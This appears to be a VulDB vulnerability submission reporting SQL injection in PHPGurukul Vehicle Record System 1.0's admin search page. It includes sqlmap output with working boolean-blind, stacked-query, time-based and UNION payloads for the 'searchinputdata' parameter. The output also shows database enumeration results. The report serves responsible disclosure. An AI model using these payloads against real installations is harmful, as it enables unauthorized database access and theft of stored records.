Submit #427426: PHPGurukul Vehicle Record System Project V1.0 SQL Injectioninfo

TitlePHPGurukul Vehicle Record System Project V1.0 SQL Injection
DescriptionI would like to report a SQL injection vulnerability I discovered in phpgurukul - Vehicle Record System Project during my testing. Details: Affected URL/Endpoint: /vehiclerecordsystem/admin/search-vehicle.php Vulnerable Parameter: 'searchinputdata' Risk Level: High (allows malicious users to execute arbitrary SQL queries) Steps to reproduce: 1) Navigate to Search below and input a reference number for example: 'Toyota' 2) Use a proxy like burpsuite to intercept the request. 3) Input the payload to invoke the SQL injection. sqlmap resumed the following injection point(s) from stored session: --- Parameter: searchinputdata (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: searchinputdata=Toyota' AND 9682=(SELECT (CASE WHEN (9682=9682) THEN 9682 ELSE (SELECT 4515 UNION SELECT 4759) END))-- -&Submit=Submit Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: searchinputdata=Toyota';SELECT SLEEP(5)#&Submit=Submit Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: searchinputdata=Toyota' AND (SELECT 1666 FROM (SELECT(SLEEP(5)))emnV)-- IHIs&Submit=Submit Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: searchinputdata=Toyota' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178787171,0x76436f6e5676554f61466d68685870657577464f49704d45456f43534d756a565166494b7a72526f,0x716b707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&Submit=Submit --- [11:48:46] [INFO] testing MySQL [11:48:46] [WARNING] reflective value(s) found and filtering out [11:48:46] [INFO] confirming MySQL [11:48:46] [INFO] the back-end DBMS is MySQL [11:48:46] [INFO] fetching banner web application technology: PHP 8.2.18, Apache 2.4.59 back-end DBMS: MySQL >= 8.0.0 banner: '8.3.0' [11:48:46] [INFO] fetching current user current user: 'root@localhost' [11:48:46] [INFO] fetching current database current database: 'vrsdb' Please let me know if you need further information or a more detailed analysis.
User
 Delvy (UID 74555)
Submission10/21/2024 05:50 (2 years ago)
Moderation10/24/2024 08:08 (3 days later)
StatusAccepted
VulDB entry281675 [PHPGurukul Vehicle Record System 1.0 search-vehicle.php searchinputdata sql injection]
Points17

PreviousOverviewNext

Do you want to use VulDB in your project?

Use the official API to access entries easily!